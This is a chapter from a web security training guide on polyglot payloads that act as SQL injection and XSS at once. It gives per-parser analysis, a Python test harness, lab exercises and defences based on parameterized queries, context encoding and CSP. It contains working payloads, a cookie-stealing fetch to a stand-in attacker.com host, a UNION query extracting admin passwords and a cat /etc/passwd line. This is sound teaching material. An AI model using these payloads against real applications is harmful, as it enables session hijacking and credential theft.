Polyglot payloads are single inputs that are valid, and have the intended effect, in more than one parsing context at once. This guide covers payloads built to act as both SQL injection and XSS, which cuts the number of requests needed during testing.
The constraint that makes or breaks a polyglot is that every parser the string passes through (SQL, HTML, JavaScript, the shell) reads the same bytes under its own quoting and comment rules. A character that closes a string in one context can open an unterminated token in another, and a parse error in any one context means that half of the payload does nothing. Each example below notes how each context actually tokenizes the string, not only what the string is meant to do.
| Benefit | Description |
|---|---|
| Efficiency | One request tests multiple vulnerabilities |
| Obfuscation | Harder for filters to detect intent |
| Coverage | Uncovers chained vulnerabilities |
| Real-world | Mirrors actual attack scenarios |
Payload:

```
'">><script>alert(1)</script>' OR '1'='1'--
```

SQL Context:

```sql
SELECT * FROM users WHERE name = ''">><script>alert(1)</script>' OR '1'='1'--'
-- The leading ' closes the string literal, but the " right after it opens a second
-- quoted token (a string in MySQL, an identifier in PostgreSQL and SQLite) that is
-- never closed, so the statement fails to parse and OR '1'='1' never executes.
-- The error is still an injection indicator; for the always-true branch to run,
-- the " has to be balanced or hidden inside a SQL comment.
```

HTML Context:

```html
<div>
'">><script>alert(1)</script>' OR '1'='1'--
</div>
<!-- Inside element text the quotes are inert; <script>alert(1)</script> is parsed
     as a real element and executes. -->
```

Payload:
```
'" onclick="alert(1)" OR 1=1--
```

SQL Injection:

```sql
WHERE field = ''" onclick="alert(1)" OR 1=1--'
-- The three " characters cannot pair up: the last one opens a quoted token that is
-- never closed, so this is a parse error rather than an always-true condition.
```

HTML Attribute:

```html
<input value='" onclick="alert(1)" OR 1=1--' />
<!-- The leading ' closes a single-quoted value; the tokenizer then treats the stray "
     as a junk attribute name and onclick="alert(1)" as a real attribute. In a
     double-quoted value (value="...") the " does the closing instead. Either way
     the XSS fires only when the user clicks the element. -->
```

Payload:
```
'">><marquee onstart=alert(1)>' OR 1=1--
```

Breakdown:
- `'` closes the SQL string literal (and a single-quoted HTML attribute)
- `"` closes a double-quoted HTML attribute; in SQL it opens a quoted token that nothing closes
- `>` closes the HTML tag the input landed in
- `<marquee onstart=alert(1)>` is the XSS payload (a legacy element; `onstart` support varies by browser)
- `'` opens a SQL string again
- `OR 1=1` is the injected condition
- `--` comments out the rest of the query

The HTML half works as described; the SQL half does not, because the unbalanced `"` makes the statement a parse error in every common dialect.
Payload:

```
';alert(1);' OR '1'='1'--
```

JavaScript Context:

```javascript
var x = '';alert(1);' OR '1'='1'--';
// The first ' closes the literal and ;alert(1); is a valid statement, but the tail
// ' OR '1'='1'--' is the string ' OR ' followed directly by the number 1, which is a
// SyntaxError. JavaScript has no -- comment, so the whole script block fails to
// compile and alert(1) never runs. ';alert(1);// works in this context on its own,
// but does nothing for the SQL half, which is broken either way.
```

SQL Context:

```sql
WHERE field = '';alert(1);' OR '1'='1'--'
-- The ; ends the statement after field = ''. What follows is either rejected outright
-- (drivers that refuse stacked queries) or parsed as a second statement calling an
-- unknown function alert(); both are errors, so OR '1'='1' never runs.
```

Payload:
```
'"/><img src=x onerror=alert(1)> OR 1=1--
```

HTML Context:

```html
<input value='"/><img src=x onerror=alert(1)> OR 1=1--' />
<!-- The leading ' empties the single-quoted value (a double-quoted one is closed by
     the "); /> then terminates the input tag and the <img> that follows is a new
     element whose onerror handler fires as soon as the bogus src fails to load.
     No user interaction is needed. -->
```

SQL Context:

```sql
WHERE field = '"/><img src=x onerror=alert(1)> OR 1=1--'
-- Same problem as above: the unpaired " leaves an unterminated token, so this is a
-- parse error, not an always-true condition.
```

Payload:
```
';alert(1);'; cat /etc/passwd; echo '
```

SQL Context:

```sql
WHERE field = '';alert(1);'; cat /etc/passwd; echo '';
-- The ; after '' terminates the statement; alert(1) is an unknown function and the
-- remainder is a stray string literal. Error, nothing executes.
```

JavaScript Context:

```javascript
var x = '';alert(1);'; cat /etc/passwd; echo '';
// This one is valid JavaScript: var x = ''; then alert(1); then the harmless
// expression statement '; cat /etc/passwd; echo '. alert(1) executes.
```

Command Context:

```sh
echo '';alert(1);'; cat /etc/passwd; echo '';
# ( and ) are shell metacharacters, so alert(1) is a syntax error, and the five
# quote characters leave the line with an unterminated string. The shell rejects
# the whole line before running anything: cat /etc/passwd does not execute.
```

Count quote marks and comment markers for each parser before trusting a multi-context payload; a single token that one parser cannot accept silently removes that context from the polyglot.

Payload:
```json
{
  "name": "'\"><script>alert(1)</script>' OR 1=1--"
}
```

Multiple Contexts:
- JSON parser: a valid string; `\"` decodes to a plain `"`, so the application receives `'"><script>alert(1)</script>' OR 1=1--`
- SQL query: injection payload, with the same unbalanced `"` caveat as above once it reaches the query
- HTML display: XSS payload
Payload:

```xml
<user>'"/><script>alert(1)</script>' OR 1=1--</user>
```

Multiple Contexts:
- XML parser: well-formed, but `<script>` becomes a child element of `<user>`, not text; a consumer that reads the text of `<user>` gets only the fragments around it. To deliver the tags as data, entity-encode them (`&lt;script&gt;`) or wrap the value in a CDATA section.
- SQL query: injection payload
- HTML rendering: XSS payload
Step 1: Send Polyglot Payload

```http
POST /search HTTP/1.1
Content-Type: application/x-www-form-urlencoded

query='"><script>alert(1)</script>' OR 1=1--
```

The body is shown decoded for readability; on the wire the quotes, angle brackets and spaces must be URL-encoded, otherwise the server's form parser mangles the payload before it reaches any of the contexts under test.

Step 2: Observe Multiple Responses
| Context | Indicator |
|---|---|
| SQL Injection | Different result set, error message |
| XSS | Alert popup, script execution |
| HTML | Rendered tags, styling changes |
Step 3: Confirm Vulnerabilities
If polyglot triggers:
- Test SQL injection separately
- Test XSS separately
- Determine if chained exploitation possible
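The three steps above can be rehearsed offline before touching a target. The following is an added example, not part of the original guide: it takes a payload, builds the SQL query by string concatenation the way the vulnerable application would and runs it against an in-memory SQLite table with three constructed users, then renders the same string into an HTML body, a single-quoted attribute and a double-quoted attribute and reports which `<script>` elements or `on*` handlers the parser actually produces. The table, the users, the two HTML templates and the comment-wrapped variant `'/*"><img ...>*/ OR 1=1--` are assumptions made for the demo; the JavaScript context is left out because it needs a JS parser. Run with the page's first payload, the SQL half fails to parse (the unbalanced `"`), which is the error-message indicator from the table; the variant hides the HTML inside `/* */` so the database skips it, returns all three rows and fires in every HTML context.

```python
import sqlite3
from html.parser import HTMLParser

# Constructed sample data: one legitimate match, three rows total.
USERS = [("alice",), ("bob",), ("carol",)]

# The page's first payload: the " after the leading ' is never closed in SQL.
PAGE_PAYLOAD = "'\">><script>alert(1)</script>' OR '1'='1'--"
# Assumed variant: the HTML sits inside a SQL block comment, so both parsers accept it.
POLYGLOT = "'/*\"><img src=x onerror=alert(1)>*/ OR 1=1--"

# Assumed output contexts: element text, single-quoted and double-quoted attribute.
HTML_TEMPLATES = {
    "body": "<div>{}</div>",
    "attr_single": "<input value='{}'>",
    "attr_double": '<input value="{}">',
}


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?)", USERS)
    return conn


def sql_context(payload):
    """Concatenate the payload into the query, as the vulnerable app does, and
    return ('rows', n) if SQLite accepts it or ('error', message) if it does not."""
    query = "SELECT name FROM users WHERE name = '" + payload + "'"
    try:
        return ("rows", len(make_db().execute(query).fetchall()))
    except sqlite3.Error as exc:
        return ("error", str(exc))


class HandlerFinder(HTMLParser):
    """Record every <script> start tag and every on* attribute the parser sees."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("<script>")
        for name, value in attrs:
            if name.startswith("on"):
                self.hits.append(f"<{tag} {name}={value}>")


def html_contexts(payload):
    """Render the payload into each template; return the executable markup found,
    keyed by context (an empty list means the payload stayed inert there)."""
    result = {}
    for ctx, template in HTML_TEMPLATES.items():
        finder = HandlerFinder()
        finder.feed(template.format(payload))
        finder.close()
        result[ctx] = finder.hits
    return result


def matrix(payload):
    """One row of the observation table: SQL outcome plus each HTML context."""
    return {"sql": sql_context(payload), **html_contexts(payload)}


if __name__ == "__main__":
    for label, payload in (("benign", "alice"), ("page", PAGE_PAYLOAD), ("polyglot", POLYGLOT)):
        print(label)
        for ctx, outcome in matrix(payload).items():
            print(f"  {ctx:12} {outcome}")
```

Two caveats when carrying this over to a real target: Python's html.parser is tolerant rather than spec-exact, so confirm attribute-context results in a browser; and MySQL only treats `--` as a comment when whitespace follows it, so append a space there (SQLite and PostgreSQL accept a bare `--`).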
Application:
- Search box displays results on page
- Search term stored in database
- Search history shown to users
Polyglot:

```
'/*"><img src=x onerror=alert(1)>*/ OR 1=1--
```

The HTML is wrapped in a SQL block comment so the query still parses: the database sees `name = '' OR 1=1`, while the HTML tokenizer ignores `/*` and `*/` and renders the `<img>`. The `'">` prefix form used in the earlier examples would give the XSS but fail the SQL half on the unbalanced `"`.

Impact:
- SQL injection returns all results
- XSS executes when other users view history
- Stored XSS + SQL injection combo
Application:
- User comments stored in database
- Comments displayed to all users
- Admin panel shows all comments
Polyglot:

```
'"/><script>fetch('https://attacker.com/?c='+document.cookie)</script>'
UNION SELECT username,password FROM admin--
```

Impact:
- SQL injection extracts admin credentials
- XSS steals session cookies
- Data exfiltration to attacker server

As written this holds for the HTML half only. On the SQL side the unbalanced `"` and the quotes inside `fetch('...')` keep the `UNION` from ever being parsed as SQL, and a `UNION` only works when its column count and types match the original `SELECT`. Develop the two halves separately and only then combine them.
Application:
- Profile fields saved to database
- Profile displayed on public pages
- Multiple output contexts
Polyglot:

```
';alert(1);' OR 1=1;--
```

Impact:
- SQL injection modifies other profiles
- XSS executes when viewing profile
- JavaScript injection if field used in JS

This has the same shape, and the same limitation, as the JavaScript example above: the tail `' OR 1=1;--'` is a syntax error in JavaScript and the `;` after `''` is an error in SQL, so per-context variants are needed before either impact is real.
Variations on the first payload (only the SQL tail changes):

```
'">><script>alert(1)</script>' AND 1=1--
'">><script>alert(1)</script>' OR 1=1--
'">><script>alert(1)</script>' OR 1=1 FROM DUAL--
```

`AND 1=1` keeps the original result set while `OR 1=1` widens it. `FROM DUAL` only belongs after a `SELECT` list (Oracle, MySQL); appended to an `OR` clause it is a syntax error. All three still carry the unbalanced `"`, so expect a database error rather than a changed result set unless it is balanced or commented out.
Check:
- Input stored in database (SQL context)
- Input displayed on pages (HTML context)
- Input used in JavaScript (JS context)
- Input reflected in responses (XSS context)
Opportunity Matrix:
| Stored? | Displayed? | JavaScript? | Polyglot Potential |
|---|---|---|---|
| Yes | Yes | Yes | High |
| Yes | Yes | No | Medium |
| No | Yes | Yes | Low (XSS only) |
| Yes | No | Yes | Low (SQL only) |
Layer 1: Input Validation

A character blocklist is the weakest of the three layers: it rejects legitimate input (O'Brien, a<b) and is exactly what encoding and polyglot tricks are designed to get around. Treat it as a tripwire, not as the control.

```python
import re

def sanitize_input(user_input):
    # Strip the characters the payloads above depend on: angle brackets, both quote styles, semicolons
    cleaned = re.sub(r"[<>'\";]", "", user_input)
    return cleaned
```

Layer 2: Context-Specific Output Encoding

```python
import html
import json

# HTML context: entity-encode; quote=True is the default and also covers ' and "
html.escape(user_input)

# SQL context: parameterized query, the value never becomes part of the SQL text
cursor.execute("SELECT * FROM users WHERE name = ?", (user_input,))

# JavaScript context: JSON-encode for a string literal; json.dumps leaves </script>
# intact, so additionally escape < (as \u003c) when the result lands in an inline script
json.dumps(user_input)
```

Layer 3: Content Security Policy

```
Content-Security-Policy: default-src 'self'; script-src 'none'
```

`script-src 'none'` blocks the injected `<script>` and inline event handlers, but also every legitimate script; real deployments use `'self'` plus nonces or hashes, which still leave inline `onerror=` handlers blocked.

Setup:
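Layer 2 is the one that actually stops the polyglots, because it never lets the input be parsed as code in any context. The following is an added example, not from the original guide: it wires the three encoders to an in-memory SQLite table with three constructed users and the comment-wrapped polyglot from the search-history case study, and it also closes the gap in the `json.dumps` advice: JSON encoding leaves `</script>` untouched, so a value dropped into an inline `<script>` block can still close that block. The table, the users, the sample inputs and the helper names are assumptions.

```python
import html
import json
import sqlite3

# Constructed sample data and inputs for the demo.
USERS = [("alice",), ("bob",), ("carol",)]
POLYGLOT = "'/*\"><img src=x onerror=alert(1)>*/ OR 1=1--"
SCRIPT_BREAKOUT = "</script><script>alert(1)</script>"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?)", USERS)
    return conn


def safe_query(user_input):
    """SQL context: the value travels as a bound parameter, never as SQL text,
    so quotes and comment markers in it are just characters. Returns the row count."""
    cur = make_db().execute("SELECT name FROM users WHERE name = ?", (user_input,))
    return len(cur.fetchall())


def for_html(user_input):
    """HTML text and attribute context: entity-encode < > & " and '
    (html.escape does all five with its default quote=True)."""
    return html.escape(user_input)


def naive_js(user_input):
    """The Layer 2 advice as written: a JSON string literal, nothing more."""
    return json.dumps(user_input)


def for_js(user_input):
    """Inline <script> string literal: JSON-encode, then replace the characters the
    HTML tokenizer cares about with JS unicode escapes so a literal </script> (or an
    HTML comment opener) inside the value cannot end the script element. The JS
    engine turns the escapes back into the original characters at runtime."""
    return (
        json.dumps(user_input)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


def js_decodes_to(literal):
    """What the JS engine sees after parsing the literal (JSON and JS share this
    escape syntax for string literals)."""
    return json.loads(literal)


def render_history_row(user_input):
    """Search-history entry from the first case study, encoded per context:
    the term appears in an attribute, in element text and in an inline script."""
    return (
        f'<li data-term="{for_html(user_input)}">{for_html(user_input)}</li>\n'
        f"<script>var term = {for_js(user_input)};</script>"
    )


if __name__ == "__main__":
    print("rows for polyglot via bound parameter:", safe_query(POLYGLOT))
    print("naive JS literal:", naive_js(SCRIPT_BREAKOUT))
    print("safe JS literal: ", for_js(SCRIPT_BREAKOUT))
    print(render_history_row(POLYGLOT))
```

The bound-parameter query returns zero rows for the polyglot because it is compared as a literal name, the HTML encoder leaves no `<`, `'` or `"` for the tokenizer to act on, and the JS encoder yields a literal that still decodes to the original value but contains no `</script>` sequence.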
- Application with search feature
- Results displayed on same page
Task:
- Send SQL injection + XSS polyglot
- Confirm both vulnerabilities trigger
- Exploit chained vulnerability
Payload:

```
'">><script>alert(1)</script>' OR 1=1--
```
Setup:
- Comment system with database storage
- Comments visible to all users
Task:
- Inject polyglot comment
- Verify SQL injection works
- Confirm XSS executes for other users
Setup:
- Profile field used in multiple contexts
Task:
- Craft payload for SQL + XSS + JS contexts
- Test in each context
- Maximize impact
- Polyglots test multiple vulnerabilities with one request
- Context matters - Same payload works differently
- Each parser must accept the whole string: an unbalanced `"` in SQL or a stray token in JavaScript is a parse error that silently drops that context
- Stored XSS + SQL injection = powerful combo
- Defense requires context-aware encoding
- Efficiency gain - Reduce testing requests significantly
Continue to 20 - Multibyte Encoding Bypass to learn about character set-based bypasses.